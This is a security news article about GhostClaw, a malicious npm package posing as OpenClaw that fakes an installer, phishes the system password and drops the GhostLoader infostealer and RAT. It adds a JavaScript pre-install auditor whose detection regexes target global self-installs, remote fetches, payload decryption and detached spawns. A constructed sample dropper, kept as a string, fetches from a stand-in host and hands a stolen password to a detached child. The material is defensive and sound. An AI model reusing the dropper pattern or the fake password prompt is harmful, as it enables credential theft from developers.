
In reality, it delivers a powerful malware framework that steals developer secrets, browser data, crypto wallet files, and system credentials, then installs a persistent remote access tool for long-term control.
The package looks harmless at first. Its metadata and source files present it as a normal utility, but the real malicious logic is hidden in setup and post-install scripts.
One of the first warning signs is a postinstall hook that silently re-installs the package globally. That puts the fake openclaw command on the system PATH, so the malicious code can be launched from any shell afterwards, even though the victim only ever ran a single local install.
Fake Installer, Real Credential Theft
The first-stage script is heavily obfuscated and launches a polished fake installer in the terminal.
It shows progress bars, spinners, and realistic setup messages to convince the victim that a genuine installation is underway.
After the fake setup completes, the script displays a bogus Keychain authorization prompt asking for the user’s system password.
The password request is the core of the attack. The malware checks each entry against the operating system's real authentication, so a mistyped password produces exactly the error a genuine prompt would, and the fake is hard to tell apart from the real thing.
Once the correct password is entered, the malware can reach protected data that would otherwise be much harder to steal.
At the same time, the script quietly contacts a remote server, downloads an AES-256-GCM-encrypted second-stage payload, decrypts it, writes it to a temporary file, and launches it as a detached background process.
The stolen password is passed to the second stage through environment variables. On macOS, the malware may also prompt the user to grant Full Disk Access to Terminal, which unlocks sensitive stores such as Safari history, Apple Notes, Mail, and iMessage history.
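The behaviours described above (a postinstall hook that re-installs the package globally, a remote fetch of an AES-256-GCM blob, a payload written to the temp directory and spawned detached, and a captured password handed over through the child's environment) are all visible in a package's files before it is ever installed. The following is an added example, not code from the article or from the GhostClaw package, of a static pre-install triage that scores a package.json and its bundled scripts against those indicators. The indicator regexes and weights are this example's own judgement, not a published scheme, and the sample package.json and setup script are constructed stand-ins that are only scanned, never executed.

```javascript
'use strict';

// npm lifecycle hooks that run automatically during `npm install`.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Behavioural indicators drawn from the report. Weights are this example's
// own judgement (an assumption), not a published scoring scheme.
const INDICATORS = [
  // postinstall re-installing the package globally to land a command on PATH
  { name: 'global-self-install', weight: 4, re: /npm\s+(?:i|install)\b(?:\s+\S+)*?\s+(?:-g|--global)\b/ },
  // remote fetch of a second stage
  { name: 'remote-fetch', weight: 2, re: /\bfetch\s*\(|\bhttps?\.(?:get|request)\s*\(|\b(?:curl|wget)\s+https?:/i },
  // AES-256-GCM decryption of a downloaded blob
  { name: 'payload-decrypt', weight: 3, re: /createDecipheriv\s*\(\s*['"]aes-256-gcm['"]/i },
  // something written under the temp dir and then executed shortly after
  { name: 'temp-file-exec', weight: 3, re: /(?:tmpdir\s*\(|\/tmp\/)[\s\S]{0,300}?\b(?:spawn|spawnSync|exec|execSync|execFile|fork)\s*\(/ },
  // child detached from the installer so it outlives `npm install`
  { name: 'detached-spawn', weight: 3, re: /detached\s*:\s*true/ },
  // a captured secret handed to the child through its environment
  { name: 'secret-in-env', weight: 3, re: /env\s*:\s*\{[^}]*\b\w*(?:PASS|PWD|TOKEN|SECRET)\w*\s*:/i },
  // javascript-obfuscator style identifiers or hex-escaped string tables
  { name: 'obfuscation', weight: 2, re: /_0x[0-9a-f]{4,}\b|(?:\\x[0-9a-f]{2}){4,}/i },
];

// Score a package from its package.json text and a map of { path: source text }.
function auditPackage(packageJsonText, files) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];

  // Any lifecycle hook at all is worth reading; npm runs these without asking.
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ name: `lifecycle:${hook}`, where: 'package.json', weight: 3, detail: scripts[hook] });
    }
  }

  // Scan the hook commands themselves plus every bundled source file.
  const sources = [
    ...Object.entries(scripts).map(([k, v]) => [`package.json#scripts.${k}`, v]),
    ...Object.entries(files),
  ];
  for (const [where, text] of sources) {
    for (const ind of INDICATORS) {
      if (ind.re.test(text)) findings.push({ name: ind.name, where, weight: ind.weight });
    }
  }

  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  const verdict = score >= 8 ? 'block' : score >= 3 ? 'review' : 'ok';
  return { score, verdict, findings };
}

// Constructed sample package (assumed name, not the real package).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'example-cli',
  version: '1.0.0',
  bin: { 'example-cli': 'bin/cli.js' },
  scripts: { postinstall: 'npm install -g . && node lib/setup.js' },
});

// Constructed stand-in for a first-stage script with the shape the report
// describes. key, iv, plain and pw are deliberately undefined: this text is
// only ever scanned as a string, never run.
const SAMPLE_SETUP_JS = `
const _0x4a2b = ['\\x68\\x74\\x74\\x70\\x73'];
const https = require('https'), crypto = require('crypto'), os = require('os');
const fs = require('fs'), path = require('path'), { spawn } = require('child_process');
https.get('https://example.invalid/stage2.bin', (res) => { /* collect body */ });
const d = crypto.createDecipheriv('aes-256-gcm', key, iv);
const out = path.join(os.tmpdir(), '.s2.js');
fs.writeFileSync(out, plain);
spawn(process.execPath, [out], { detached: true, stdio: 'ignore', env: { ...process.env, SUDO_PASS: pw } }).unref();
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE_JSON, { 'lib/setup.js': SAMPLE_SETUP_JS }), null, 2));
}
if (typeof module !== 'undefined') module.exports = { auditPackage, INDICATORS, SAMPLE_PACKAGE_JSON, SAMPLE_SETUP_JS };
```

Run it over the extracted contents of an `npm pack` tarball before installing. A lone postinstall (native builds commonly have one) only lands in "review", so the point is to read the hook, not to auto-reject; the combination of a global self-install with fetch, decrypt, temp-file execution and a secret in the child's environment is what pushes a package to "block".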
Persistent RAT Targets Developers
The second-stage payload, internally called GhostLoader, is a large JavaScript malware bundle that acts as both an infostealer and a remote access trojan.
It installs itself in a hidden directory disguised as .npm_telemetry, adds shell hooks to startup files, and on Linux also creates a cron job for reboot persistence.
GhostLoader steals a wide range of data. According to JFrog, it collects SSH keys, AWS credentials, Azure and GCP profiles, Kubernetes configs, Docker settings, Git credentials, GitHub CLI tokens, npm data, Solana keys, browser passwords, cookies, autofill records, crypto wallet files, and seed phrases.
It also targets AI tool configurations, including files related to OpenClaw-like environments.
The malware then compresses the stolen data and sends it to attacker-controlled servers and Telegram channels.
After installation, it enters persistent mode and can execute commands, open URLs, start a SOCKS5 proxy, re-collect files, update itself, or clone a live browser session using the Chrome DevTools Protocol.
This case shows how software supply chain attacks are evolving. For developers, the lesson is clear: treat any npm package that requests system credentials, runs hidden install scripts, or downloads remote payloads as highly suspicious. A legitimate npm install never needs your login or Keychain password, and installing with --ignore-scripts (or setting ignore-scripts=true in your npm config) stops lifecycle hooks like this postinstall from running until you have read them.
The post GhostClaw Poses As OpenClaw To Steal Sensitive Developer Data appeared first on Cyber Security News.
